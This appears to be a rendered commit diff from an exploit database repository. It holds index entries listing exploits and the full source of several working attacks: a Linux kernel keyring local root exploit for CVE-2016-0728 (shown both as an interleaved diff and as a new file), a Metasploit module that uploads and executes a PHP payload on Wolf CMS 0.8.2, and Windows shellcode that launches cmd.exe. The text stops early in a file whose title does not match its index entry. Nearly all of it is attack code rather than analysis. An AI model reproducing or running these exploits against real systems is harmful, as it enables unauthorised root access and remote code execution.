39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (msf)",2016-06-15,"Markus Wulftange",linux,remote,443
39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443
39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0
@ -36161,12 +36162,12 @@ id,file,description,date,author,platform,type,port
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80
39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80
39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (msf)",2016-06-21,"Jos Wetzels",windows,remote,1604
39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604
39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash PoC",2016-06-21,"Ilca Lucian",linux,dos,0
39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
@ -36180,3 +36181,6 @@ id,file,description,date,author,platform,type,port
39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80
39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent XSS",2016-06-21,"David Silveiro",php,webapps,80
39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21
40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80
40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0

Can't render this file because it is too large.

270
platforms/linux/local/39277.c
View file

@ -5,12 +5,10 @@
# CVE : CVE-2016-0728
*/
/* CVE-2016-0728 local root exploit
modified by Federico Bento to read kernel symbols from /proc/kallsyms
props to grsecurity/PaX for preventing this in so many ways
/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */
$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
$ ./cve_2016_072 PP_KEY */
/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */
#include <stdio.h>
#include <stdlib.h>
@ -30,183 +28,143 @@ _commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff810bb050)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)
#define COMMIT_CREDS_ADDR (0xffffffff81094250)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)
struct key_type {
char * name;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
};
/* thanks spender - Federico Bento */
static unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}
ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
void userspace_revoke(void * key) {
commit_creds(prepare_kernel_cred(0));
commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
struct {
long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
struct { long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;
my_key_type = malloc(sizeof(*my_key_type));
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
if(commit_creds == NULL || prepare_kernel_cred == NULL) {
commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source");
keyring_name = argv[1];
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
my_key_type = malloc(sizeof(*my_key_type));
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
puts("Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("keyctl");
return -1;
}
}
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
puts("finished increfing");
puts("forking...");
/* allocate msg struct in the kernel rewriting the freed keyring object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("fork");
return -1;
}
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
keyring_name = argv[1];
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
puts("finished forking");
sleep(5);
puts("[+] Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
/* call userspace_revoke from kernel */
puts("caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("keyctl_revoke");
}
puts("[+] Finished increfing");
puts("[+] Forking...");
/* allocate msg struct in the kernel rewriting the freed keyring object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("[-] fork");
return -1;
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("[-] msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("[-] msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
}
puts("[+] Finished forking");
sleep(5);
/* call userspace_revoke from kernel */
puts("[+] Caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("[+] keyctl_revoke");
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
return 0;
return 0;
}

212
platforms/linux/local/40003.c Executable file
View file

@ -0,0 +1,212 @@
/*
# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
*/
/* CVE-2016-0728 local root exploit
modified by Federico Bento to read kernel symbols from /proc/kallsyms
props to grsecurity/PaX for preventing this in so many ways
$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
$ ./cve_2016_072 PP_KEY */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff810bb050)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)
struct key_type {
char * name;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
};
/* thanks spender - Federico Bento */
static unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}
ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
void userspace_revoke(void * key) {
commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
struct {
long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}
printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
if(commit_creds == NULL || prepare_kernel_cred == NULL) {
commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source");
}
my_key_type = malloc(sizeof(*my_key_type));
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
keyring_name = argv[1];
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
puts("[+] Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
puts("[+] Finished increfing");
puts("[+] Forking...");
/* allocate msg struct in the kernel rewriting the freed keyring object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("[-] fork");
return -1;
}
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("[-] msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("[-] msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
}
puts("[+] Finished forking");
sleep(5);
/* call userspace_revoke from kernel */
puts("[+] Caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("[+] keyctl_revoke");
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
return 0;
}

132
platforms/php/remote/40004.rb Executable file
View file

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize
super(
'Name' => 'Wolfcms 0.8.2 Arbitrary PHP File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability in Wolfcms
version 0.8.2. This application has an upload feature that
allows an authenticated user with administrator roles to upload
arbitrary files to the '/public' directory.
},
'Author' => [
'Narendra Bhati', # Proof of concept
'Rahmat Nurfauzi' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-6568'],
['CVE', '2015-6567'],
['OSVDB','126852'],
['EDB', '38000'],
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Wolfcms <= 0.8.2', {}]
],
'DisclosureDate' => 'Aug 28 2015',
'Privileged' => false,
'DefaultTarget' => 0
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to wolfcms', '/wolfcms']),
OptString.new('USER', [true, 'User to login with', '']),
OptString.new('PASS', [true, 'Password to login with', '']),
], self.class)
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/?/admin/login/login/"),
'vars_post' => {
"login[username]" => datastore['USER'],
"login[password]" => datastore['PASS'],
"login[redirect]" => "/wolfcms/?/admin"
}
})
return res
end
def exploit
upload_name = rand_text_alpha(5 + rand(5)) + '.php'
get_cookie = login.get_cookies
cookie = get_cookie.split(";")[3]
token = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/browse/")
})
html = token.body
if html =~ /Files/
print_status("Login successfuly")
end
csrf_token = html.scan(/<input\s*id=\"csrf_token\"\s*name=\"csrf_token\"\s*type=\"hidden\"\s*value=\"(.*)"/).last.first
boundary = Rex::Text.rand_text_hex(28)
data = "-----------------------------#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"csrf_token\"\r\n"
data << "\r\n"
data << csrf_token
data << "\r\n"
data << "-----------------------------#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload[path]\"\r\n\r\n"
data << "/"
data << "\r\n"
data << "-----------------------------#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload_file\"; filename=\"#{upload_name}\"\r\n"
data << "Content-Type: text/x-php\r\n"
data << "\r\n"
data << payload.encoded
data << "\r\n"
data << "-----------------------------#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"commit\"\r\n"
data << "\r\n"
data << "Upload\r\n"
data << "-----------------------------#{boundary}--\r\n\r\n"
print_good("#{peer} - Payload uploaded as #{upload_name}")
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------' + boundary,
'Cookie' => cookie,
},
'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/upload/")
})
register_file_for_cleanup(upload_name)
print_status("#{peer} - Executing shell...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "public",upload_name),
})
end
end

273
platforms/win32/shellcode/40005.c Executable file
View file

@ -0,0 +1,273 @@
/*
# Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode
# Date : 22-06-2016
# Author : Roziul Hasan Khan Shifat
# Tested on : Windows 7,10 x86
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;EAX=PEB
mov eax,[eax+0xc] ;EAX=PEB->Ldr
mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList
lodsd ; EAX=ntdll.dll
xchg eax,esi ;EAX=ESI , ESI=EAX
lodsd ; EAX=Third(kernel32)
mov ebx,[eax+0x10] ;PVOID Dllbase (base address)
;-------------------------------
mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header
mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress
add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY)
mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames
xor ecx,ecx
;-----------------------
Get_func:
inc ecx ;increment the ordinal
lodsd ;Get name offset
add eax,ebx ;(offset+kernel32.dll base adress)=Get function name
cmp dword [eax],0x50746547 ;GetP
jnz Get_func
cmp dword [eax+0x4],0x41636f72 ;rocA
jnz Get_func
cmp dword [eax+0x8],0x65726464 ;ddre
jnz Get_func
;---------------------
mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals
add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
mov cx,[esi+ecx*2] ;CX=Number of Function
dec ecx
mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
add esi,ebx ;ESI=beginning of Address table
mov edx,[esi+ecx*4];EDX=Pointer(offset)
add edx,ebx ;Edx=GetProcAddress
;-----------------------------
xor esi,esi
mov esi,edx ;backup of GetProcAddress
xor edi,edi
mov edi,ebx
;--------------
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ebx ;address of kernel32.dll
call edx
add esp,12
;-----------------
xor ecx,ecx
;finding address of ExitProcess
push 0x42737365
mov [esp+3],cl
push 0x636f7250
push 0x74697845
push esp
push edi
xor edi,edi
mov edi,eax
call esi
;----------------------------
add esp,12
;LoadLibraryA("shell32.dll")
xor ecx,ecx
push ecx
push 0x416c6c64
mov [esp+3],cl
push 0x2e32336c
push 0x6c656873
push esp
xor edx,edx
mov edx,edi ;Edx=LoadLibraryA
mov edi,eax ;edi=ExitProcess
call edx
add esp,11
;------------------
;finding address of ShellExecuteA()
xor ecx,ecx
push 0x42424241
mov [esp+1],cl
push 0x65747563
push 0x6578456c
push 0x6c656853
push esp
push eax
call esi
;-------------------
;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1);
add esp,13
xor ecx,ecx
push 0x41657865
mov [esp+3],cl
push 0x2e646d63
push esp
pop ecx
xor edx,edx
inc edx
push edx
xor edx,edx
push edx
push edx
push ecx
push edx
push edx
call eax
call edi
*/
/*
Disassembly of section .text:
00401000 <_start>:
401000: 31 c9 xor %ecx,%ecx
401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
401006: 8b 40 0c mov 0xc(%eax),%eax
401009: 8b 70 14 mov 0x14(%eax),%esi
40100c: ad lods %ds:(%esi),%eax
40100d: 96 xchg %eax,%esi
40100e: ad lods %ds:(%esi),%eax
40100f: 8b 58 10 mov 0x10(%eax),%ebx
401012: 8b 53 3c mov 0x3c(%ebx),%edx
401015: 01 da add %ebx,%edx
401017: 8b 52 78 mov 0x78(%edx),%edx
40101a: 01 da add %ebx,%edx
40101c: 8b 72 20 mov 0x20(%edx),%esi
40101f: 01 de add %ebx,%esi
401021: 31 c9 xor %ecx,%ecx
00401023 <Get_func>:
401023: 41 inc %ecx
401024: ad lods %ds:(%esi),%eax
401025: 01 d8 add %ebx,%eax
401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
40102d: 75 f4 jne 401023 <Get_func>
40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
401036: 75 eb jne 401023 <Get_func>
401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
40103f: 75 e2 jne 401023 <Get_func>
401041: 8b 72 24 mov 0x24(%edx),%esi
401044: 01 de add %ebx,%esi
401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx
40104a: 49 dec %ecx
40104b: 8b 72 1c mov 0x1c(%edx),%esi
40104e: 01 de add %ebx,%esi
401050: 8b 14 8e mov (%esi,%ecx,4),%edx
401053: 01 da add %ebx,%edx
401055: 31 f6 xor %esi,%esi
401057: 89 d6 mov %edx,%esi
401059: 31 ff xor %edi,%edi
40105b: 89 df mov %ebx,%edi
40105d: 31 c9 xor %ecx,%ecx
40105f: 51 push %ecx
401060: 68 61 72 79 41 push $0x41797261
401065: 68 4c 69 62 72 push $0x7262694c
40106a: 68 4c 6f 61 64 push $0x64616f4c
40106f: 54 push %esp
401070: 53 push %ebx
401071: ff d2 call *%edx
401073: 83 c4 0c add $0xc,%esp
401076: 31 c9 xor %ecx,%ecx
401078: 68 65 73 73 42 push $0x42737365
40107d: 88 4c 24 03 mov %cl,0x3(%esp)
401081: 68 50 72 6f 63 push $0x636f7250
401086: 68 45 78 69 74 push $0x74697845
40108b: 54 push %esp
40108c: 57 push %edi
40108d: 31 ff xor %edi,%edi
40108f: 89 c7 mov %eax,%edi
401091: ff d6 call *%esi
401093: 83 c4 0c add $0xc,%esp
401096: 31 c9 xor %ecx,%ecx
401098: 51 push %ecx
401099: 68 64 6c 6c 41 push $0x416c6c64
40109e: 88 4c 24 03 mov %cl,0x3(%esp)
4010a2: 68 6c 33 32 2e push $0x2e32336c
4010a7: 68 73 68 65 6c push $0x6c656873
4010ac: 54 push %esp
4010ad: 31 d2 xor %edx,%edx
4010af: 89 fa mov %edi,%edx
4010b1: 89 c7 mov %eax,%edi
4010b3: ff d2 call *%edx
4010b5: 83 c4 0b add $0xb,%esp
4010b8: 31 c9 xor %ecx,%ecx
4010ba: 68 41 42 42 42 push $0x42424241
4010bf: 88 4c 24 01 mov %cl,0x1(%esp)
4010c3: 68 63 75 74 65 push $0x65747563
4010c8: 68 6c 45 78 65 push $0x6578456c
4010cd: 68 53 68 65 6c push $0x6c656853
4010d2: 54 push %esp
4010d3: 50 push %eax
4010d4: ff d6 call *%esi
4010d6: 83 c4 0d add $0xd,%esp
4010d9: 31 c9 xor %ecx,%ecx
4010db: 68 65 78 65 41 push $0x41657865
4010e0: 88 4c 24 03 mov %cl,0x3(%esp)
4010e4: 68 63 6d 64 2e push $0x2e646d63
4010e9: 54 push %esp
4010ea: 59 pop %ecx
4010eb: 31 d2 xor %edx,%edx
4010ed: 42 inc %edx
4010ee: 52 push %edx
4010ef: 31 d2 xor %edx,%edx
4010f1: 52 push %edx
4010f2: 52 push %edx
4010f3: 51 push %ecx
4010f4: 52 push %edx
4010f5: 52 push %edx
4010f6: ff d0 call *%eax
4010f8: ff d7 call *%edi
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7";
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}

140
platforms/win64/remote/39999.rb Executable file
View file

@ -0,0 +1,140 @@
=begin
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 22-06-2016
